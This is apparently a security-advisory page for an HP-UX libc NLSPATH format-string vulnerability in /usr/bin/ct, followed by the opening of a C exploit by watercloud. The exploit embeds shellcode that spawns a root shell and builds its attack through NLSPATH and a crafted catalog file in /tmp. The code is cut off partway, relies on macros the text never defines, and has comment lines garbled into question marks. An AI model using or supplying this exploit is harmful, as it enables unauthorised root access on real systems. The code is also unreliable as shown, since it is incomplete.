As we reported in our previous article HP-UX libc NLSPATH Environment Variable Privilege Elevation Vulnerability, a locally exploitable buffer overflow in the program allows local users to gain elevated privileges. The following exploit code can be used to test your system for the mentioned vulnerability.
Credit:
The information has been provided by watercloud.
Exploit:
/***********************************************************************
* File : x_hp-ux11i_nls_ct.c
* Usage : cc x_hp-ux11i_nls_ct.c -o x_ct ; ./x_ct
* Purpose :
* HP-UX??????????????/usr/bin/ct?????????????????root???
* Get a local rootshell from /usr/bin/ct,using HP-UX location language format string bug.
* Author : watercloud@xfocus.org
* Date : 2003-1-4
* Tested : On HP-UX B11.11 .
* Note : Use as your risk!
* Site : http://www.xfocus.org (EN)
* http://www.xfocus.net (CN)
***********************************************************************/
#include<stdio.h>
#define PATH "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
#define TERM "TERM=xterm"
#define NLSPATH "NLSPATH=/tmp/.ex.cat"
char buffer[512];
char buff[72]=
"\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
"\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
"/bin/shA";
int * pint = (int *) &buff[56];
unsigned int haddr = 0;
unsigned int dstaddr = 0;
int main(argc,argv,env)
int argc;char ** argv;char **env;
{
unsigned int * pa = (unsigned int*)env;
FILE * fp = NULL;
int xnum = (LOW_STACK - ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4;
int alig1= ENV_BEGIN - xnum*8;
int alig2=0;
int i=0;
while(*pa != NULL)
*pa++=0;
if(strlen(CMD) >ENV_BEGIN-3)
{
printf("No enough space to alig our env!\n");
exit(1);
}
printf("Exploite for HP-UX 11i NLS format bug by command ct.\n");
printf("From watercloud@xfocus.org. 2003-1-4\n");
printf(" Site : http://www.xfocus.net (CN).\n");
printf(" Site : http://www.xfocus.org (EN).\n");
